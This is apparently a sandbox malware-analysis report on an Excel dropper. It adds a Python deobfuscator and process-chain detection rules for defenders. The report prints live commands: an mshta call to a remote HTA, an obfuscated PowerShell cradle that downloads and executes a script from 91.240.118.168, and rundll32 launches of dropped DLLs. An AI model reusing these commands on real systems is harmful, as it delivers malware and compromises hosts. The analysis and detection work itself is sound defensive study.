Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 1496 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 % (2 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000006.00000002.682247362.00000000002C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation (4 occurrences)

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D374 mov eax, dword ptr fs:[00000030h] 9_2_0018D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D374 mov eax, dword ptr fs:[00000030h] 10_2_0023D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD374 mov eax, dword ptr fs:[00000030h] 11_2_001CD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D374 mov eax, dword ptr fs:[00000030h] 12_2_0078D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060D374 mov eax, dword ptr fs:[00000030h] 14_2_0060D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001ED374 mov eax, dword ptr fs:[00000030h] 15_2_001ED374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Process-creation chain, in execution order:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
(The report records this powershell.exe command line three times under separate signatures; it is listed once here. Each fragment carries the junk token {HgfRrtGdf}, which .replace() strips at run time; joined in the order $c1,$c4,$c3 the fragments form (New-Object Net.WebClient).DownloadString('http://91.240.118.168/qqw/aas/se.png'). The first backtick-split I`E`X evaluates that string, which fetches se.png; the second executes what was fetched, so the second-stage script runs from memory, and the DLL written to C:\ProgramData is its work, not the document's.)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
(From the DllRegisterServer call on QWER.dll onward, every stage is a rundll32.exe re-launch on a module under a randomly named directory below C:\Windows\SysWOW64 with a random non-.dll extension, invoked first through a random export name and then through DllRegisterServer. The odd extension and the SysWOW64 subdirectory are the two properties worth hunting on: rundll32 loading anything that is not a .dll/.cpl/.ocx, or anything one directory level below System32/SysWOW64, is rare in normal operation.)
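The following Python is an added worked example, not part of the Joe Sandbox report: it reconstructs the download cradle from the powershell.exe command line listed above by parsing each `$var='...'.replace('junk', '')` assignment, un-escaping PowerShell's doubled single quotes, honouring the `-Join` order rather than the variable names, and counting the backtick-split IEX calls. The command line is copied from the report; the function and variable names are the example's own.

```python
"""Rebuild the PowerShell download cradle from the mshta.exe -> powershell.exe
command line above. The cradle assigns three string fragments, strips the
junk token {HgfRrtGdf} from each with .replace(), joins them in the order
$c1,$c4,$c3 (not the order the names suggest), and pipes the result through
a backtick-split I`E`X twice: once to evaluate the string (the download),
once to run what was downloaded."""
import re

# The argument portion of the command line recorded in the report, split
# across several raw-string pieces only for readability.
SAMPLE_CMDLINE = (
    r"powershell.exe -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj"
    r"{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'"
    r".replace('{HgfRrtGdf}', ''); "
    r"$c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow"
    r"{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); "
    r"$c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp"
    r"{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');"
    r"$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# $name='literal'.replace('junk', '')  -- PowerShell single-quoted string, '' is an escaped quote
_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'\.replace\('([^']*)'\s*,\s*''\)", re.IGNORECASE)
# ($a,$b,$c -Join '')
_JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s*-join\s*''\s*\)", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def strip_fragments(cmdline):
    """Return {var: cleaned fragment} for every token-stripped string assignment."""
    fragments = {}
    for name, literal, junk in _ASSIGN_RE.findall(cmdline):
        literal = literal.replace("''", "'")   # undo PowerShell quote escaping
        fragments[name] = literal.replace(junk, "")
    return fragments


def join_order(cmdline):
    """Return the variable names in the order the -Join expression concatenates them."""
    m = _JOIN_RE.search(cmdline)
    if not m:
        return []
    return [v.strip().lstrip("$") for v in m.group(1).split(",")]


def deobfuscate(cmdline):
    """Concatenate the cleaned fragments in -Join order; fall back to assignment order."""
    fragments = strip_fragments(cmdline)
    order = join_order(cmdline) or list(fragments)
    return "".join(fragments[v] for v in order if v in fragments)


def count_iex(cmdline):
    """Count Invoke-Expression calls once backtick splitting (I`E`X -> IEX) is undone."""
    flat = cmdline.replace("`", "")
    return len(re.findall(r"\b(?:iex|invoke-expression)\b", flat, re.IGNORECASE))


def extract_urls(text):
    return _URL_RE.findall(text)


if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE_CMDLINE)
    print("decoded:", decoded)
    print("urls   :", extract_urls(decoded))
    print("iex    :", count_iex(SAMPLE_CMDLINE))
```

Two IEX calls on a string that resolves to DownloadString() is the signature of a staged cradle: the first evaluation performs the fetch, the second runs the fetched text, so the URL in the decoded string is the one to block and hunt for, not the se.html that mshta requested.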
Source: Yara match File source: DETAILS-145.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED
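As an added example (not from the report or from Joe Sandbox), the process-creation events of this chain as constructed Sysmon-style tuples, run through the detection logic a SOC would need to cover it: Office spawning a shell, mshta running a remote HTA and spawning PowerShell, PowerShell with the string-rebuilding markers, and rundll32 loading a module from C:\ProgramData, from a subdirectory under SysWOW64, with a non-.dll extension, or via DllRegisterServer. The EXCEL.EXE to cmd.exe line and the two benign controls are constructed; the other command lines are taken from the report. Tag names and the two-marker threshold are the example's own.

```python
"""Detection logic for the process chain recorded above, run over constructed
process-creation events of the shape (parent_image, image, command_line)
that a Sysmon Event ID 1 or Windows 4688 record would provide."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe"}
# Extensions rundll32 legitimately loads; the chain above uses .yhq, .qpz, .nzb, .shx.
NORMAL_MODULE_EXT = {"dll", "cpl", "ocx", "ax", "drv"}

# rundll32.exe "C:\path\mod.ext",Export   or   rundll32.exe C:\path\mod.ext Export
_RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))\s*,?\s*(\S+)?', re.IGNORECASE)
# Markers of the string-rebuilding cradle; any one alone is common in admin scripts.
_PS_MARKERS = (
    re.compile(r"\w`\w"),                          # backtick-split token such as I`E`X
    re.compile(r"\.replace\(", re.IGNORECASE),     # junk token stripped at run time
    re.compile(r"-join\s*''", re.IGNORECASE),      # fragments concatenated at run time
    re.compile(r"downloadstring|webclient", re.IGNORECASE),
)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_rundll32(cmdline):
    """Return (module_path, entry_point) from a rundll32 command line, or (None, None)."""
    m = _RUNDLL_RE.search(cmdline)
    if not m:
        return None, None
    return (m.group(1) or m.group(2)), m.group(3)


def module_extension(module):
    name = basename(module)
    return name.rsplit(".", 1)[-1] if "." in name else ""


def classify(parent, image, cmdline):
    """Return the detection tags that fire on one process-creation event."""
    tags = []
    p, i = basename(parent), basename(image)
    if p in OFFICE_APPS and i in SHELLS:
        tags.append("office_spawns_shell")
    if p == "mshta.exe" and i in {"cmd.exe", "powershell.exe"}:
        tags.append("mshta_spawns_shell")
    if i == "mshta.exe" and re.search(r"https?://", cmdline, re.IGNORECASE):
        tags.append("mshta_remote_hta")
    if i == "powershell.exe" and sum(1 for rx in _PS_MARKERS if rx.search(cmdline)) >= 2:
        tags.append("obfuscated_powershell")
    # Also inspect cmd.exe lines that merely wrap a rundll32 invocation.
    if i == "rundll32.exe" or "rundll32" in cmdline.lower():
        module, entry = parse_rundll32(cmdline)
        if module:
            low = module.lower()
            if "\\programdata\\" in low:
                tags.append("rundll32_module_in_programdata")
            if module_extension(module) not in NORMAL_MODULE_EXT:
                tags.append("rundll32_non_dll_extension")
            if re.search(r"\\sys(?:wow64|tem32)\\[^\\]+\\[^\\]+$", low):
                tags.append("rundll32_module_in_system_subdir")
            if entry and entry.lower() == "dllregisterserver":
                tags.append("rundll32_dllregisterserver")
    return tags


def triage(events):
    """Return [(index, tags)] for every event on which at least one tag fired."""
    hits = []
    for n, ev in enumerate(events):
        tags = classify(*ev)
        if tags:
            hits.append((n, tags))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
R32 = r"C:\Windows\SysWOW64\rundll32.exe"
SAMPLE_EVENTS = [
    # Constructed: the macro launching cmd.exe (cmd's own command line is not in the report).
    (r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", r"C:\Windows\System32\cmd.exe",
     r"cmd /c mshta http://91.240.118.168/qqw/aas/se.html"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta http://91.240.118.168/qqw/aas/se.html"),
    # Shortened from the report's command line; the markers that matter are kept.
    (r"C:\Windows\System32\mshta.exe", PS,
     r"powershell.exe -noexit $c1='({HgfRrtGdf}Ne{HgfRrtGdf}w-Object Net.We'.replace('{HgfRrtGdf}', '');"
     r"$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"),
    (PS, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD'),
    (r"C:\Windows\System32\cmd.exe", R32, r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD"),
    (R32, R32, r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer'),
    (R32, R32, r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi'),
    # Constructed benign controls that must not fire.
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    (r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for n, tags in triage(SAMPLE_EVENTS):
        print(n, basename(SAMPLE_EVENTS[n][1]), tags)
```

The rundll32 rules are applied to the command line rather than only to the rundll32.exe image so that the cmd.exe wrapper in the chain fires too; the PowerShell rule requires two of its four markers because `.replace(` or `-join` on its own appears in plenty of legitimate scripts.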

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation (2 occurrences)
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation (2 occurrences)
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
